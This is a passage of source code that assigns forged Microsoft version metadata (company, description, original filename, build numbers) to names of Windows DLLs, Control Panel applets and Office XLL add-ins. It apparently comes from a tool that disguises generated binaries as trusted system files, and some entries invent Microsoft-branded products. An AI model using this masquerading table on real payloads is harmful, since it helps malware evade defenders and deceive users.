vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.387"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 387
vi.StringFileInfo.OriginalFilename = "cfgmgr32.dll"
}
if name == "combase" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "COMBASE.DLL"
vi.StringFileInfo.FileDescription = "Microsoft COM for Windows"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "COMBASE.DLL"
}
if name == "cryptsp" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "cryptsp.dll"
vi.StringFileInfo.FileDescription = "Cryptographic Service Provider API"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "cryptsp.dll"
}
if name == "dnsapi" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "dnsapi"
vi.StringFileInfo.FileDescription = "DNS Client API DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "dnsapi"
}
if name == "dpapi" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "dpapi.dll"
vi.StringFileInfo.FileDescription = "Data Protection API"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "dpapi.dll"
}
if name == "sechost" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "sechost.dll"
vi.StringFileInfo.FileDescription = "Host for SCM/SDDL/LSA Lookup APIs"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "sechost.dll"
}
if name == "schannel" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "schannel.dll"
vi.StringFileInfo.FileDescription = "TLS / SSL Security Provider"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "schannel.dll"
}
if name == "urlmon" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "UrlMon.dll"
vi.StringFileInfo.FileDescription = "OLE32 Extensions for Win32"
vi.StringFileInfo.FileVersion = "11.00.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 11
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Internet Explorer"
vi.StringFileInfo.ProductVersion = "11.00.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "UrlMon.dll"
}
if name == "win32u" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Win32u"
vi.StringFileInfo.FileDescription = "Win32u"
vi.StringFileInfo.FileVersion = "10.0.18362.900 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.900"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "Win32u"
}
if name == "appwizard" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "appwiz.cpl"
vi.StringFileInfo.FileDescription = "Shell Application Manager"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "APPWIZ.CPL.MUI"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "appwiz.cpl"
}
if name == "bthprop" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "bthprops.cpl"
vi.StringFileInfo.FileDescription = "Bluetooth Control Panel Applet"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "bluetooth.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "bthprops.cpl"
}
if name == "desktop" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "desk.cpl"
vi.StringFileInfo.FileDescription = "Desktop Settings Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "DESK.CPL.MUI"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "DESK"
}
if name == "netfirewall" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Firewall.cpl"
vi.StringFileInfo.FileDescription = "Windows Defender Firewall Control Panel DLL Launching Stub"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Firewall.cpl"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "Firewall.cpl"
}
if name == "FlashPlayer" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = " Adobe Flash Player Control Panel Applet 32.0"
vi.StringFileInfo.FileDescription = " Adobe Flash Player Control Panel Applet"
vi.StringFileInfo.FileVersion = "32.0.0.255"
vi.StringFileInfo.LegalCopyright = " Copyright © 1996-2019 Adobe. All Rights Reserved. Adobe and Flash are either trademarks or registered trademarks in the United States and/or other countries."
vi.StringFileInfo.OriginalFilename = "FlashPlayerCPLApp.cpl"
vi.FixedFileInfo.ProductVersion.Patch = 0
vi.FixedFileInfo.ProductVersion.Major = 32
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "32.0.0.255"
vi.FixedFileInfo.FileVersion.Major = 32
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 0
vi.FixedFileInfo.FileVersion.Build = 255
vi.StringFileInfo.InternalName = "FlashPlayerCPLApp.cpl"
}
if name == "hardwarewiz" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "hdwwiz.cpl"
vi.StringFileInfo.FileDescription = "Add Hardware Control Panel Applet"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "hdwwiz.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "hdwwiz"
}
if name == "inet" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "inetcpl.cpl"
vi.StringFileInfo.FileDescription = "Internet Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "inetcpl.cpl"
}
if name == "control" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "intl.cpl"
vi.StringFileInfo.FileDescription = "Control Panel DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "CONTROL"
}
if name == "irprop" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "irprops.cpl"
vi.StringFileInfo.FileDescription = "Infrared Control Panel Applet"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "irprops.cpl"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "Infrared Properties"
}
if name == "Game" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "joy.cpl"
vi.StringFileInfo.FileDescription = "Game Controllers Control Panel Applet"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "JOY.CPL.MUI"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "JOY.CPL"
}
if name == "inputs" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "main.cpl"
vi.StringFileInfo.FileDescription = "Mouse and Keyboard Control Panel Applets"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "main.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "main.cpl"
}
if name == "mimosys" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "mmsys.dll"
vi.StringFileInfo.FileDescription = "Audio Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "MMSys.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "mmsys.cpl"
}
if name == "ncp" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "ncpa.cpl"
vi.StringFileInfo.FileDescription = "Network Connections Control-Panel Stub"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "ncpa.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "ncpa.cpl"
}
if name == "power" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "powercfg.cpl"
vi.StringFileInfo.FileDescription = "Power Management Configuration Control Panel Applet"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "POWERCFG.CPL.MUI"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "powercfg.cpl"
}
if name == "speech" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "sapi.cpl"
vi.StringFileInfo.FileDescription = "Speech UX Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "sapi.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "sapi.cpl"
}
if name == "system" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "sysdm.cpl"
vi.StringFileInfo.FileDescription = "System Applet for the Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "sysdm.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "sysdm.cpl"
}
if name == "Tablet" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "TabletPC.cpl"
vi.StringFileInfo.FileDescription = "Tablet PC Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "tabletpc.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "TabletPC.cpl"
}
if name == "telephone" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "telephon.cpl"
vi.StringFileInfo.FileDescription = "Telephony Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "telephon.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "telephon.cpl"
}
if name == "datetime" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "timedate.cpl"
vi.StringFileInfo.FileDescription = "Time Date Control Panel Applet"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "timedate.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "timedate.cpl"
}
if name == "winsec" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "wscui.cpl"
vi.StringFileInfo.FileDescription = "Security and Maintenance"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "wscui.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "wscui.cpl"
}
if name == "Timesheet" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Timesheet.xll "
vi.StringFileInfo.FileDescription = "Timesheet ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Timesheet.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Timesheet.xll"
}
if name == "Reports" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Reports.xll "
vi.StringFileInfo.FileDescription = "Report ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Reports.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Reports.xll"
}
if name == "Zoom" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Zoom.xll"
vi.StringFileInfo.FileDescription = "Zoom Addon ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Zoom.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Zoom.xll"
}
if name == "Updates" {
